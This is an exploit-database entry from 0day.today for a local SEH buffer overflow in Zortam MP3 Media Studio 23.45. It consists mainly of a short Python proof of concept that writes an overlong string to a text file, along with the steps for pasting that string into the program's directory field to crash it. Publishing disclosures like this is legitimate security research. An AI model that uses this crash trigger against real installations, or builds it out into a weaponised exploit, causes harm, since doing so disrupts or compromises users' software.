Zortam MP3 Media Studio 23.45 - Local Buffer Overflow (SEH) Exploit

2018-04-17T00:00:00
ID 1337DAY-ID-30184
Type zdt
Reporter Kevin McGuigan
Modified 2018-04-17T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            #!/usr/bin/python
# Title: Zortam Mp3 Media Studio Local Buffer Overflow (SEH)
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: http://www.zortam.com/
# Version: 23.45
# Tested on: Windows 7 32 bit
# Date: 12/04/2018
# Vendor did not respond to advisory
 
 
# File > Add Disk to Mp3 Library > paste string from zortamPOC.txt into directory field
filename="zortamPOC.txt"
junk = "A" * 268
nseh = "B" * 4
seh="C" * 4
fill = "D" *900
buffer = junk + nseh + seh + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

#  0day.today [2018-04-17]  #